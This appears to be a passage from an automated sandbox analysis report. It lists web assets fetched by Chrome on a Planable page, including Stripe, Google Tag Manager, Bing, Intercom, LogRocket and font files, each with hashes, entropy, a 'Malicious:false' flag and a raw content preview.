                                                                                                                                                                              Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (651), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):651
                                                                                                                                                                              Entropy (8bit):5.650948228984566
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:540488DE9C7A7D977C6D8DF6D1F212F5
                                                                                                                                                                              SHA1:3C68062D21ED9EAD0ADEB9C371E8C9BF449BA469
                                                                                                                                                                              SHA-256:D11A9C9332795C0712DFD1382806D900D3D9DDCB03AB585B145AD10E4B031C42
                                                                                                                                                                              SHA-512:000E1F0BFBBB533EA4C69E2CC79B8FE2550C51CF2E55179850C322D255E5D0F042023D7B6E7C7A212361E89C60B2C84BC70F56E9938FBE800121A4AD21CBF423
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://js.stripe.com/v3/controller-with-preconnect-540488de9c7a7d977c6d8df6d1f212f5.html
                                                                                                                                                                              Preview:<!doctype html><html><head><link rel="preconnect" href="https://api.stripe.com" crossorigin/><meta charset="utf-8"/><meta http-equiv="origin-trial" content="AtD0WrnMwAPI4nWWCvreE+vpgPVz45SO/1fG1IZRNpBsdWZOZN6SKr0ynC11KuzrvT903WrEU+N9Ik/RpiCRTAEAAABbeyJvcmlnaW4iOiJodHRwczovL3N0cmlwZS5jb206NDQzIiwiZmVhdHVyZSI6IlRwY2QiLCJleHBpcnkiOjE3MzUzNDM5OTksImlzU3ViZG9tYWluIjp0cnVlfQ=="/><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/shared-c4e28e549eb5b349a0b557bdf9e6a58c.js"></script><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/controller-18698ccce52390086e0ed815cfd86fdb.js"></script></head><body></body></html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (17021)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):390098
                                                                                                                                                                              Entropy (8bit):5.656113791029379
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1DAB139F790CB19D1DA2F5CD19D8161E
                                                                                                                                                                              SHA1:093066BCA8964DBB38B561DDAB7BB35BC89857A8
                                                                                                                                                                              SHA-256:6F148D7C02580C1367E618352A0622F6F78894A61FB716D62D7EE32457D8C63B
                                                                                                                                                                              SHA-512:395E15FCF409C6D0E69F8128B662C406ADF7E66BB6F7D8B6B124801DE516FF82453F0B7C6B795E521DB27514A75045E892E4F15ED456021A013603B0F8229A92
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":10,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":10,"vtp_includeConditions":["list","planable\\.io"],"tag_id":12},{"function":"__ogt_session_timeout","priority":10,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":10,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELEC
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):51385
                                                                                                                                                                              Entropy (8bit):5.293328685395304
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                              SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                              SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                              SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5268)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):305339
                                                                                                                                                                              Entropy (8bit):5.562319840222928
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:128D8ADC9F63ED5386624BD6FB6B684F
                                                                                                                                                                              SHA1:51C86892CE34C92C6E499177CB98DC9F99691ECE
                                                                                                                                                                              SHA-256:33694B0B60347297D71085EA0F1644B862D31E2E002B071272544409484248D5
                                                                                                                                                                              SHA-512:FE2CD737EF5D27C3D8DD16569F9F8D53363E8CB4F27B1C5BE51279AC101C74727B5CCE9DC991C242E0DCFF854C56A9EDC30174994510407512885FB0C1463374
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":17,"vtp_instanceDestinationId":"AW-805904039","tag_id":11},{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regi
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 29564, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):29564
                                                                                                                                                                              Entropy (8bit):7.989842244106035
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1B66CCB164151A6CF698667C8B570CC6
                                                                                                                                                                              SHA1:F5617A0F087645703C874453960BE6382C8A7427
                                                                                                                                                                              SHA-256:4884FEC2C73AA52A2461073C1B87D1CEB80F400520391B43F97CA7D3C39EEB24
                                                                                                                                                                              SHA-512:74628F9CA05F31DB6D92CE52F43082952168957687DD72D36172BAD207C1448080275E4F3131E22B5E50F5EBFA2EF649BE89E605B13A6B7DEF54E161BBA4E7AA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/permanentmarker/v16/Fh4uPib9Iyv2ucM6pGQMWimMp004La2Cfw.woff2
                                                                                                                                                                              Preview:wOF2......s|..........s!.........................`..x....a......'..0..6.$..\..*. .....g.....9......U..|.Q...i3#%.o.......LF.u[......ds.3....E0'/.k0.V..%.uH.0..U.).,.Iti%..D3....Y.g.0W..|.=U....j.*....Wx....}...@...z.......^.$.5.....+.7i..........)2..hn.[$.[0j.....]...h..%..m..D1)..4..J..|P...7_..}.r......J.].UB.V.d.6.D...K.v<Q..w..i.|O5."O.....]..'.,..Cj.$...S..y3P.I..y..|..v..}.)..w[......u.H%A...!...|.Q...dow.P=..?9..........~.E...K.....^aH*.`.o.]6~}.............&i..@.!.....NX...&..[h.<#.%.[/....|....).I.7.?jQ=.MS..~......V>O:.-d..h.B....X..RAeSh.v........*....m...Pt1 ....V...A.Yh..?., d.....C......v.a.....]^_..&Vcdu.Vij...)f.....{Qp.6.EA3N.....]_o..6............i.?>@,.G..,(..IG).!..(w..%v._......w.A..J....;y.x'...c.bbP.Q...SN.+7mj.K..J.n.*..]..U..k7.s....._{..&.. v2..l...|.....P4.W.......G$a.a..ZC..J...`S....e..z..k}.....E....~....H#....!. y..>w..D"a....s...uW'..Ip..Y...r...G.Q...A./.....T.r3.2_...B.6...W..y.l...J.-.........
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 864881
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):189168
                                                                                                                                                                              Entropy (8bit):7.998241222920237
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:15EACD607B42936EEFD8A1C7BCCB267D
                                                                                                                                                                              SHA1:3CC90642FB56AECC942D8D29826D99B4B31CA326
                                                                                                                                                                              SHA-256:E691F756D368C1F0B456AF06177B3B4092DDA4827DEBB887EE3A76E1F377FA40
                                                                                                                                                                              SHA-512:62E80EA589043B9BB2F05EA04721EAC9B27D1E5B36C0203A8615A5B923B35CE68223E3DAE28BDA020CA3288473F7AF96EF3B174A6C745560995A3F1ED762159B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://js.intercomcdn.com/frame.acd77ba4.js
                                                                                                                                                                              Preview:...........yw.7./...)...?.M...z.F.(..s...;...N.l....$EY...o...-YN....E6..Q..U.o...........t.Z...l>I.......%-..:.'..I..0<M<..s.d.....;.K..}..=8...Q..y.J...N.=.g.h.]..r{y.~...w..o..8.8....).....l9:...+.U.+O...".'......!yqy:.-u...?X.dmZ..R....qg../.Sk.N;.<......L.Y{n/;Y.ize=..g.vk?.R...t`Mf..qj.O.....iuv.....J..l...~.......8...O?|..iw.r.j=s^......OO.N.K~.w......xE}..N..b6_.vg.>....m. .c..9..l.../B.s...f..<{!}7.m.b_..f/T..."./......U.F._.../.H..F..K...Fv..._.......... .......}..c...#..v(....8.P.F.r.X.|,2....wJI7t. tu..2....v(L%gI..y=Q..*.5.{.JI..a._...<.<; ....|.RH...xz..yUA$..........4."4U]...7..)u.A^.tUl..~....F...~.s..q.S....._...Gs.b..8.)t.-..{z....6.....|).7....^.I.#..H;...LO.>I...Lz..B...3-\$...yZT...GA..(..O....e....A.?.S26..>{qdG*.-..Y.\........%Q. ..B.........Qd.q1.^......E.....T...VE....b..*...K..b3/.a^B.l.o..,..c..k.._...g.8..`..(........aw..b.B...d...?.....{..^.t.....l>...i....g9L..v..|JL....*....n..}.S.N2..Sg.....g.\..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (3249)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):296049
                                                                                                                                                                              Entropy (8bit):5.563400892784455
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C0CB0719ABFE5546FE97DE28E10112E8
                                                                                                                                                                              SHA1:B1E973B27171278C6CFF460EC31CF439C14D2E2D
                                                                                                                                                                              SHA-256:5B7B1C87130C86D0156D1D406DC5F9E807C0058F9275DD1EF86D66053033E64A
                                                                                                                                                                              SHA-512:97BB82801D3E38EE28A90B09847F8D01620ADE08B3FB50348D30F9E5407EF1C08DB8AD0493D91AC0385660E2B3235ECDE03E7C331B31C02A79C1479D0294EE89
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"15",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"user_email"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__googtag","metadata":["map"],"once_per_event":true,"vtp_tagId":"G-HR91C4PWHQ","vtp_configSettingsTable":["list",["map","parameter","send
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 19612, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):19612
                                                                                                                                                                              Entropy (8bit):7.989306609316115
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2928D6930BA5E89500726A3929DE0141
                                                                                                                                                                              SHA1:AADB2E65673E9B7FC65B624C529504AD4D3D3803
                                                                                                                                                                              SHA-256:7FEC385668DD8696487A02BB35060F6BEA3B91DCA953BF942B95AD6E4BD73A5D
                                                                                                                                                                              SHA-512:0027A407FD92FBE90B9850C12BA3C8E1E65B4C8B71C822296184CE01F5E59E3BB9028F3F4E03CFB162BA81D1A6F40F5BFF020D2B4C72AA705B5AEF5339CE94D4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/hammersmithone/v17/qWcyB624q4L_C4jGQ9IK0O_dFlnrtREl.woff2
                                                                                                                                                                              Preview:wOF2......L...........L@...........................`..<.0..I.....X..+..4..6.$..d. ..n..i.`.r.5c.m..@....E....5".g]......."...U.7...a..`#e......su...P`..[ut".ie.k....],.Lw......,...)..}..~..t.a...*L.XI+...M.....Z.}....$..'..z...g.....":96"......h..k..|.....X..............\0"c...\4.E....`.L.,T.6.4..}.>`^P.I6/...1VON..+......I.._.^...........4y.2.z./\Z.(LI......&....w...$.;k9.=|.R..am.X.....$O. .{d.(..di @m....G.c{.J.(.f.D.Ez..........H.F.;.. .....tT...U_{!....h.........U...Ui.e...j......8.."...,.I2...9MR?._.p..?.*P".x..*....W.Z....p..;.=..l*K.s.q...w..u.......r.H.a.:..x...o..t.9....s..,y:.}..q...G_......VZd...h....u....>..>.<......].....&..]..H...B....h..Rj@.M..I~.._Z?.:..t.r*...j..o.1.zL..c.K$D.6...6...ik..'...%...nG.!...M..3.}.F. p.sv.@5.n~.=._u...,=l./5"lg.y...`.\...........s.s.2.....|H..`..'>...b_.|._..{e. x..M...0.....;.......v......t.Q'.....-.....y..b."h...Y{.......sY...".)p..?.....V..k..[.&?..o.$......%.MzE.<f.Y.Y'..._..$.%..8..4.8
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (10395)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):10441
                                                                                                                                                                              Entropy (8bit):5.209712799397257
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CE063C83A25CB5334855D437C88CE8F6
                                                                                                                                                                              SHA1:F66704D25AF25CA847825A4893B4FD41193E96E8
                                                                                                                                                                              SHA-256:4DF53644D1C9FD651CCFD697977EB07D94CD744B0A4997568D67CC25EF44E483
                                                                                                                                                                              SHA-512:E2D96796A6E9CB84F2E6F566FA1C5EB6AA404F7065EBCA842D858F2C7528667CF5A08F5B37A10EF94F5F25EA76E4590220A1ECB0D0D05AA9D17DA260116AFE09
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://segment.planable.io/next-integrations/integrations/facebook-pixel/2.11.5/facebook-pixel.dynamic.js.gz
                                                                                                                                                                              Preview:window['facebook-pixelDeps'] = ["/integrations/vendor/commons.a61d7bea37d2de5d4b69.js"];window['facebook-pixelLoader'] = function() { return window["facebook-pixelIntegration"]=function(e){function t(t){for(var i,a,s=t[0],p=t[1],c=t[2],d=0,l=[];d<s.length;d++)a=s[d],Object.prototype.hasOwnProperty.call(r,a)&&r[a]&&l.push(r[a][0]),r[a]=0;for(i in p)Object.prototype.hasOwnProperty.call(p,i)&&(e[i]=p[i]);for(u&&u(t);l.length;)l.shift()();return o.push.apply(o,c||[]),n()}function n(){for(var e,t=0;t<o.length;t++){for(var n=o[t],i=!0,s=1;s<n.length;s++){var p=n[s];0!==r[p]&&(i=!1)}i&&(o.splice(t--,1),e=a(a.s=n[0]))}return e}var i={},r={50:0},o=[];function a(t){if(i[t])return i[t].exports;var n=i[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,a),n.l=!0,n.exports}a.m=e,a.c=i,a.d=function(e,t,n){a.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},a.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"})
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):929334
                                                                                                                                                                              Entropy (8bit):5.369070842883182
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F5F173AE96535DF6E8CAF9AB703E6C79
                                                                                                                                                                              SHA1:120A7B829B7E787A174D84D4EFBC7821D1DC51D9
                                                                                                                                                                              SHA-256:1391B2ECE261F6E026FABEAB73CC34A98D129CDA454A9759DCDC2A4A6896767D
                                                                                                                                                                              SHA-512:396F934C63EFB3BA4A541BDAAA3E06E42653E2425F3F0D2B62F2DD788A4A3769B204ECA2B8EE89A23171FAAC7ECA90E378045750167C19A333F6B794CD067367
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn.logrocket.com/logger-1.min.js
                                                                                                                                                                              Preview:!function(){var e={12706:function(e,t,r){"use strict";var n=r(64836);Object.defineProperty(t,"__esModule",{value:!0}),t.encode=function(e){return JSON.stringify(p(e))},t.encodeAsTable=function(e){return p(e)},t.decode=function(e){return function(e){if("number"==typeof e&&e<0)return n(e);var t=new Array(e.length);function r(e){return e in t?t[e]:t[e]=n(e)}function n(t){if(t<0){if(t===i)return;if(t===a)return;if(t===s)return NaN;if(t===u)return 1/0;if(t===c)return-1/0;throw new Error("invalid ARSON index: "+t)}var n=e[t];if(n&&"object"===(0,o.default)(n)){if(Array.isArray(n)){var p=n[0];if("string"==typeof p&&p in l){var h=l[p].reconstruct,g=h();return g&&f.push({reconstruct:h,empty:g,argIndexes:n.slice(1)}),e[t]=g||h(n.slice(1).map(r))}}d.push(n)}return n}var f=[],d=[];return e.forEach((function(e,t){r(t)})),f.forEach((function(e){e.args=e.argIndexes.map(r)})),d.forEach((function(t){Object.keys(t).forEach((function(n){var o=t[n];if("number"==typeof o)if(o<0){if(o===a)return void delete
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):144
                                                                                                                                                                              Entropy (8bit):4.54178832719941
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F447C440ABF2B8AF203938329FE494F8
                                                                                                                                                                              SHA1:3E071AE6400D84FB2EBE38EAEE60E1161D9F4556
                                                                                                                                                                              SHA-256:11BBA994684E05187E8CB291F03254CE7810FB3EABBC900299F078F2E584550F
                                                                                                                                                                              SHA-512:BC05CEC72D8512A1CE483156BDCD963199EBFFD224D991AABAD638D3FA075CD7C96E20B20B85C7224925B8263143772174B3BC824EA258C0B196C83E03007C9F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{"errors":[{"code":"media_type_not_acceptable","message":"The Accept header should send a media type of application/json"}],"type":"error.list"}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (8004), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8004
                                                                                                                                                                              Entropy (8bit):4.977277479402402
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0AA981B9BC221664D7AECD276225D91D
                                                                                                                                                                              SHA1:56E9667EB3175AAB4B691FB8C5BFE2CD9CB75DB1
                                                                                                                                                                              SHA-256:473373545803601D737DB5784DED9A07684A4E941D776ADC0BE142CB48432CBE
                                                                                                                                                                              SHA-512:9B1BD55EFB234A55A1A8B717B4548C7DD0A0B80873BCDFEEC41D580561FC058AB259DCDF59BEA638640B0CF6669372962F9ADB3823747C4E24900B2CB43C4D8A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{"integrations":{"Mixpanel":{"consolidatedPageCalls":true,"crossSubdomainCookie":true,"enableEuropeanUnionEndpoint":false,"eventIncrements":[],"groupIdentifierTraits":["companyId"],"legacySuperProperties":false,"people":true,"peopleProperties":[],"persistence":"cookie","propIncrements":[],"secureCookie":false,"setAllTraitsByDefault":true,"sourceName":"","superProperties":[],"token":"bd031aa75a318d76c850854e1b644bb7","trackAllPages":false,"trackCategorizedPages":false,"trackNamedPages":false,"versionSettings":{"version":"3.2.1","componentTypes":["browser","ios","android","server"]},"type":"browser","bundlingStatus":"bundled"},"Intercom":{"activator":"#IntercomDefaultWidget","apiBase":"","appId":"","collectContext":true,"mobileApiKey":"","richLinkProperties":[],"versionSettings":{"version":"3.1.0","componentTypes":["browser","ios","android","server"]},"type":"browser","bundlingStatus":"bundled"},"Facebook Pixel":{"automaticConfiguration":true,"blacklistPiiProperties":[],"contentTypes":{}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 58668, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):58668
                                                                                                                                                                              Entropy (8bit):7.996124911952916
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2C3948D392BC4EB1A1002D9A21FC36D0
                                                                                                                                                                              SHA1:AD8BB74453BFF4987F69688008333CE199E287D6
                                                                                                                                                                              SHA-256:1E17C66B0BCCFE2D6F34849744762CF1109DE0EF1941B8924760756ECFFB5897
                                                                                                                                                                              SHA-512:72A92E2FF6C5279B4574CFFD60635E09A070F2943F0964DADCE253C4FC6064243B5E40FE97092048352C2E1BA63A8154F9505B03CFF3D6ABB9AD70E099763552
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/rocksalt/v22/MwQ0bhv11fWD6QsAVOZrt0M6.woff2
                                                                                                                                                                              Preview:wOF2.......,.......p..............................Z.`..:.......s.....l.....0...\.6.$..\. ..|..g. [>bqa.. ....&..p..t....M56...^:...Pv..l...I.2`l..n{.$$+!G3.....(J.<fv....3......4.._=..o.5GyV..(W.:.[PY.....)..[@e.,9AT*..MD......wg.-......i.\..9...gs..u{..QZ.aI6....."..............~...r.NJ.......~I.........._....t...+6R......H."...hJ.O...+.<....K....S%=.dNF.+...o.....:7.q.q.5..wTo.5.cg.(tFD.H..2v..*M.....~......y....9..C...A....&.9.FM!.v..>:.N..&u.u"..E..}Z..wQ.D....,q....0h..#C.M=q...@2..g.?Z.jAk^.p...K{.j].."`...h]....$. ..'...)....&.x.......AZ.....?..-wF.......e...*.x...45CB....b.n..1..{P..z.).X....D:^.........:..bWw.r.....1.}.U.>..d........./.:s.9.:..@...<..T..7R....._.%....D...$XK..U..^'.=.'.V..B%718.}?..N.f..p............eL..1.x...t.C.... 2.Q`..7.l3....S...NL^............(L&...=.sw{3....!.]bY[.wWB.&2...65.H.&..PHQ.kd...6{M..p..D..F8..o........=PXT..P...Hd...D".."..q..c.h.Q.O.o.x...}{=.;.%....K../...{8.......Sm.JD.hb.4EK[.......hH..$.`
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):7078
                                                                                                                                                                              Entropy (8bit):5.509722249670329
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C9E7B766641EF94E2F69B6A1B89A34AC
                                                                                                                                                                              SHA1:8B8496FFB5C8F2A50F4847EAB2157A71979475A2
                                                                                                                                                                              SHA-256:6D3FFA364EE67797943529EF3C66FFACA9D12362D58C97515F330F9D77300AFC
                                                                                                                                                                              SHA-512:068BB492C31F727199E77EE7209F71CE8CC0FDACF0C03FB4266FF7C2D76E7E0D3A0CC6C199DBCDEE69EDFA4DDA34845034C0EF873E7FBBBEBC4F6ACAFD33632B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.googleapis.com/css2?family=Source+Serif+4:wght@400;700&family=Source+Serif+Pro:wght@600&display=swap
                                                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Source Serif 4';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourceserif4/v8/vEFF2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6kAHr4cXk.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Source Serif 4';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourceserif4/v8/vEFF2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6kCXr4cXk.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek */.@font-face {. font-family: 'Source Serif 4';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourceserif4/v8/vEFF2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6kDnr4cXk.woff2) format('woff2');. unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):680
                                                                                                                                                                              Entropy (8bit):5.769630715176156
                                                                                                                                                                              Encrypted:false
